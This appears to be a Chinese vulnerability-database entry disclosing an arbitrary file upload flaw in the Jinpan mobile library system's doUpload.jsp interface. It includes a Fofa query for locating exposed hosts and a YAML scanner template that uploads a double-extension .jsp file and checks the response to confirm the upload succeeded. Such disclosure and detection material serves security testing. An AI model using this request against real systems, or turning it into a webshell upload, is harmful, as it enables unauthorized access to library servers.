jinpan-doupload-fileupload: 金盘移动图书馆系统存在任意文件上传漏洞

日期: 2025-09-01 | 影响软件: 金盘移动图书馆系统 | POC: 已公开

漏洞描述

金盘图书馆微信管理平台 doUpload.jsp接口存在任意文件上传漏洞,攻击者通过漏洞可以获取权限。 Fofa: app="金盘软件-金盘移动图书馆系统"

PoC代码[已公开]

id: jinpan-doupload-fileupload

info:
  name: 金盘移动图书馆系统存在任意文件上传漏洞
  author: zan8in
  severity: critical
  verified: true
  description: |-
    金盘图书馆微信管理平台 doUpload.jsp接口存在任意文件上传漏洞,攻击者通过漏洞可以获取权限。
    Fofa: app="金盘软件-金盘移动图书馆系统"
  reference:
    - https://mp.weixin.qq.com/s/vbuu5Dh7SshVtMVjJKaLKg
  tags: jinpan,fileupload
  created: 2024/02/28

set:
  rboundary: randomLowercase(8)
  randstr: randomLowercase(6)
rules:
  r0:
    request:
      method: POST
      path: /pages/admin/tools/uploadFile/doUpload.jsp
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
      body: "\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.jsp.jsp\"\r\n\
        Content-Type: image/jpeg\r\n\
        \r\n\
        {{randstr}}\r\n\
        ------WebKitFormBoundary{{rboundary}}--\r\n\
        "
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'"filePaths":') &&
      response.body.bcontains(b'"fileNames":') &&
      response.body.bcontains(b'"fileSizes":') &&
      response.body.bcontains(b'"uploadFileNames":')
expression: r0()
# 文件访问:http://127.0.0.1:8030/upload/2024-02-18/1708219487227.jsp

相关漏洞推荐